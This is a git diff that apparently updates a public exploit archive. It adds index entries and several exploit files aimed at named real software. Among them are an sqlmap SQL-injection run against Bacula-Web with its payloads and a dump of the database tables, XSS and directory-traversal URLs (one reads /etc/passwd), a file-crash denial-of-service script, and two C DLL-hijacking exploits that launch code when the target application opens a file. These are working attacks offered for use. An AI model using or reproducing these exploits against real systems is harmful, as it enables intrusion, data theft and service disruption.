diff --git a/files.csv b/files.csv index 4e8b2d94a..b8189da05 100755 --- a/files.csv +++ b/files.csv @@ -31378,6 +31378,7 @@ id,file,description,date,author,platform,type,port 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0 34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80 @@ -31393,3 +31394,14 @@ id,file,description,date,author,platform,type,port 34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,metasploit,linux,remote,7426 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80 +34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0 +34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0 +34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plug-in Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0 +34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross Site Scripting Vulnerability",2009-07-15,Moudi,php,webapps,0 +34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service Vulnerability",2010-10-19,Sweet,windows,dos,0 +34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal Vulnerability",2009-08-27,Inj3ct0r,php,webapps,0 +34874,platforms/php/webapps/34874.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps,0 +34875,platforms/php/webapps/34875.txt,"QuarkMail 'tf' Parameter Directory Traversal Vulnerability",2009-08-28,Securitylab.ir,php,webapps,0 +34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0 +34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 'search.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0 +34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 'gamelist.php' Cross Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0 diff --git a/platforms/php/webapps/34851.txt b/platforms/php/webapps/34851.txt new file mode 100755 index 000000000..6b73170e1 --- /dev/null +++ b/platforms/php/webapps/34851.txt @@ -0,0 +1,84 @@ +bacula-web 5.2.10 vulnerability + +Bacula-web is an web base application that provide you a summarized view all of the jobs bacula-director. + +title : Bacula-web 5.2.10 +godork : "jobid=" bacula-web + + +vulnerability : ++ Sql injection + example : http://target.com/bacula-web/joblogs.php?jobid=99' +PoC : + + + @BlackCyber:/media/data/sqlmap$ python sqlmap.py -u "http://localhost/bacula-web-5.2.10/joblogs.php?jobid=20874" -D bacula --tables --dbms=mysql --level 3 --risk 3 --threads 5 --random-agent + + sqlmap/1.0-dev - automatic SQL injection and database takeover tool + http://sqlmap.org + + [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + + [*] starting at 23:25:45 + + [23:25:45] [INFO] fetched random HTTP User-Agent header from file '/media/data/sqlmap/txt/user-agents.txt': Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 Chrome/2.0.172.6 Safari/530.7 + [23:25:46] [INFO] testing connection to the target URL + sqlmap identified the following injection points with a total of 0 HTTP(s) requests: + --- + Place: GET + Parameter: jobid + Type: boolean-based blind + Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) + Payload: jobid=20874' RLIKE (SELECT (CASE WHEN (4767=4767) THEN 20874 ELSE 0x28 END)) AND 'aVuC'='aVuC + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause + Payload: jobid=20874' AND (SELECT 8355 FROM(SELECT COUNT(*),CONCAT(0x7164667171,(SELECT (CASE WHEN (8355=8355) THEN 1 ELSE 0 END)),0x7162666371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dams'='dams + + Type: UNION query + Title: MySQL UNION query (NULL) - 4 columns + Payload: jobid=20874' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7164667171,0x7950756c6975654b5356,0x7162666371)# + --- + [23:25:47] [INFO] testing MySQL + [23:25:48] [WARNING] reflective value(s) found and filtering out + [23:25:48] [INFO] confirming MySQL + [23:25:50] [INFO] the back-end DBMS is MySQL + web server operating system: Linux Debian 6.0 (squeeze) + web application technology: PHP 5.3.3, Apache 2.2.16 + back-end DBMS: MySQL >= 5.0.0 + [23:25:50] [INFO] fetching tables for database: 'bacula' + Database: bacula + [24 tables] + +----------------+ + | BaseFiles | + | CDImages | + | Client | + | Counters | + | Device | + | File | + | FileSet | + | Filename | + | Job | + | JobHisto | + | JobMedia | + | Location | + | LocationLog | + | Log | + | Media | + | MediaType | + | PathHierarchy | + | PathVisibility | + | Pool | + | Status | + | Storage | + | UnsavedFiles | + | Path | + | Version | + +----------------+ + +Affected version : +bacula-web 5.2.10 +links vulnerable http://www.bacula-web.org/download/articles/bacula-web-release-5210.html?file=files/bacula-web.org/downloads/bacula-web-5.2.10.tgz + ++ Credits : +all of pemancing ghalau.... /^wishnusakti diff --git a/platforms/php/webapps/34871.txt b/platforms/php/webapps/34871.txt new file mode 100755 index 000000000..8c2f6c534 --- /dev/null +++ b/platforms/php/webapps/34871.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44212/info + +FormXP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +FormXP 2007 is vulnerable; other versions may also be affected. + +http://www.example.com/forms/survey_result.php?sid=1>'>alert(407605250012)%3B \ No newline at end of file diff --git a/platforms/php/webapps/34873.txt b/platforms/php/webapps/34873.txt new file mode 100755 index 000000000..36d7f9921 --- /dev/null +++ b/platforms/php/webapps/34873.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/44223/info + +Wap-motor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +Versions prior to Wap-motor 18.1 are vulnerable. + +http://www.example.com/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif +http://www.example.com/gallery/gallery.php?image=%00../../template/config.php%00.gif +http://www.example.com/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif \ No newline at end of file diff --git a/platforms/php/webapps/34874.txt b/platforms/php/webapps/34874.txt new file mode 100755 index 000000000..d8989cfcf --- /dev/null +++ b/platforms/php/webapps/34874.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/44225/info + +SkyBlueCanvas is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +SkyBlueCanvas 1.1 r237 is vulnerable; other versions may also be affected. + +http://www.example.com/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS +http://www.example.com/skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtyp e=">XSS +http://www.example.com/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=e ditpage&id=" onfocus=alert(0) > +http://www.example.com/skybluecanvas/admin.php?mgroup=pictures&mgr=media&dir='XSS diff --git a/platforms/php/webapps/34875.txt b/platforms/php/webapps/34875.txt new file mode 100755 index 000000000..6046b3257 --- /dev/null +++ b/platforms/php/webapps/34875.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/44226/info + +QuarkMail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +http://www.example.com/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes \ No newline at end of file diff --git a/platforms/php/webapps/34876.txt b/platforms/php/webapps/34876.txt new file mode 100755 index 000000000..8d582a936 --- /dev/null +++ b/platforms/php/webapps/34876.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/44229/info + +E-Gold Game Series: Pirates of The Caribbean is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/demo/caribbean/?y=1 and 1=1&x=1 TRUE +http://www.example.com/demo/caribbean/?y=1 and 1=2&x=1 FALSE \ No newline at end of file diff --git a/platforms/php/webapps/34877.txt b/platforms/php/webapps/34877.txt new file mode 100755 index 000000000..113076e6c --- /dev/null +++ b/platforms/php/webapps/34877.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/44237/info + +DigiOz Guestbook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +DigiOz Guestbook 1.7.2 is vulnerable; other versions may also be affected. + +http://www.example.com/guestbook/search.php +Put: "> diff --git a/platforms/php/webapps/34878.txt b/platforms/php/webapps/34878.txt new file mode 100755 index 000000000..cbf34ef54 --- /dev/null +++ b/platforms/php/webapps/34878.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44238/info + +StandAloneArcade is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +StandAloneArcade 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/demo/gamelist.php?cat=1alert(405750665179)%3B \ No newline at end of file diff --git a/platforms/windows/dos/34872.py b/platforms/windows/dos/34872.py new file mode 100755 index 000000000..2ea4bb27f --- /dev/null +++ b/platforms/windows/dos/34872.py @@ -0,0 +1,24 @@ +source: http://www.securityfocus.com/bid/44220/info + +MASS PLAYER is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users. + +MASS PLAYER 2.1 is vulnerable; other versions may also be affected. + +#Exploit Title :MASS PLAYER 2.1 Denial of service vulnerability +#Software : MASS PLAYER 2.1 +#Software link :http://sourceforge.net/projects/massmusicplayer/ +#Autor : Sweet +#Email : charif38@hotmail.fr +#Date : 19/10/2010 +#Software version : 2.1 +#Tested on : WinXP sp3 ENG +#!/usr/bin/python +#thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org +#et 1,2,3 viva L'Algerie +outfile="crash.mp3" +junk="\x41" * 7000 +FILE=open(outfile, "w") +FILE.write(junk) +FILE.close() \ No newline at end of file diff --git a/platforms/windows/remote/34868.c b/platforms/windows/remote/34868.c new file mode 100755 index 000000000..b3666794a --- /dev/null +++ b/platforms/windows/remote/34868.c @@ -0,0 +1,80 @@ +source: http://www.securityfocus.com/bid/44198/info + +Phoenix Project Manager is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +Phoenix Project Manager 2.1.0.8 is vulnerable; other versions may also be affected. + +=================================================== +Phoenix DLL Hijacking Exploit (wbtrv32.dll) +=================================================== + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 +0 _ __ __ __ 1 +1 /' \ __ /'__`\ /\ \__ /'__`\ 0 +0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 +1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 +0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 +1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 +0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 +1 \ \____/ >> Exploit database separated by exploit 0 +0 \/___/ type (local, remote, DoS, etc.) 1 +1 1 +0 [+] Site : Inj3ct0r.com 0 +1 [+] Support e-mail : submit[at]inj3ct0r.com 1 +0 0 +1 ######################################### 1 +0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 +1 ######################################### 0 +0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 + + +/* +#Phoenix DLL Hijacking Exploit (wbtrv32.dll) +#Author : anT!-Tr0J4n +#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends +#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com +#Software : http://www.phoenixcpm.com/ +#Tested on: Windows? XP sp3 +#Home : www.Dev-PoinT.com $ http://inj3ct0r.com $ http://0xr00t.com + + +========================== +How TO use : Compile and rename to wbtrv32.dll , create a file in the same dir with one of the following extensions. +check the result > Hack3d +========================== + + +# wbtrv32.dll(code) +*/ + +#include "stdafx.h" + +void init() { +MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003); +} + + +BOOL APIENTRY DllMain( HANDLE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) +{ +case DLL_PROCESS_ATTACH: + init();break; +case DLL_THREAD_ATTACH: +case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: +break; + } + return TRUE; +} + +============================================ + +special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member + +============================================= \ No newline at end of file diff --git a/platforms/windows/remote/34869.c b/platforms/windows/remote/34869.c new file mode 100755 index 000000000..62c99857a --- /dev/null +++ b/platforms/windows/remote/34869.c @@ -0,0 +1,98 @@ +source: http://www.securityfocus.com/bid/44205/info + +Cool iPhone Ringtone Maker is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +Cool iPhone Ringtone Maker 2.2.3 is vulnerable; other versions may also be affected. + +=================================================== +Cool Iphone Ringtone DLL Hijacking Exploit (dwmapi.dll) +=================================================== + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 +0 _ __ __ __ 1 +1 /' \ __ /'__`\ /\ \__ /'__`\ 0 +0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 +1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 +0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 +1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 +0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 +1 \ \____/ >> Exploit database separated by exploit 0 +0 \/___/ type (local, remote, DoS, etc.) 1 +1 1 +0 [+] Site : Inj3ct0r.com 0 +1 [+] Support e-mail : submit[at]inj3ct0r.com 1 +0 0 +1 ######################################### 1 +0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 +1 ######################################### 0 +0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 + + + +/* +#Cool Iphone Ringtone DLL Hijacking Exploit (dwmapi.dll) + +#Author : anT!-Tr0J4n + +#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends + +#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com + +#Software : http://www.coolrecordedit.com + +#Version : 2.2.3 + +#Tested on: Windows? XP sp3 + +#Home : www.Dev-PoinT.com $ http://inj3ct0r.com + + +========================== +How TO use : Compile and rename to dwmapi.dll , create a file in the same dir with one of the following extensions. + + check the result > Hack3d + +========================== + + +# dwmapi.dll(code) +*/ + + +#include +#define DLLIMPORT __declspec (dllexport) + +DLLIMPORT void DwmDefWindowProc() { evil(); } +DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } +DLLIMPORT void DwmEnableComposition() { evil(); } +DLLIMPORT void DwmEnableMMCSS() { evil(); } +DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } +DLLIMPORT void DwmGetColorizationColor() { evil(); } +DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } +DLLIMPORT void DwmGetWindowAttribute() { evil(); } +DLLIMPORT void DwmIsCompositionEnabled() { evil(); } +DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } +DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } +DLLIMPORT void DwmRegisterThumbnail() { evil(); } +DLLIMPORT void DwmSetDxFrameDuration() { evil(); } +DLLIMPORT void DwmSetPresentParameters() { evil(); } +DLLIMPORT void DwmSetWindowAttribute() { evil(); } +DLLIMPORT void DwmUnregisterThumbnail() { evil(); } +DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } + +int evil() +{ + WinExec("calc", 0); + exit(0); + return 0; +} + + + +============================================ + +special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member + +============================================= diff --git a/platforms/windows/remote/34870.html b/platforms/windows/remote/34870.html new file mode 100755 index 000000000..186c4f367 --- /dev/null +++ b/platforms/windows/remote/34870.html @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/44211/info + +VLC media player is prone to a remote code-execution vulnerability. + +Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. + +VLC media player 1.1.4 is vulnerable; other versions may also be affected. + + + + + + \ No newline at end of file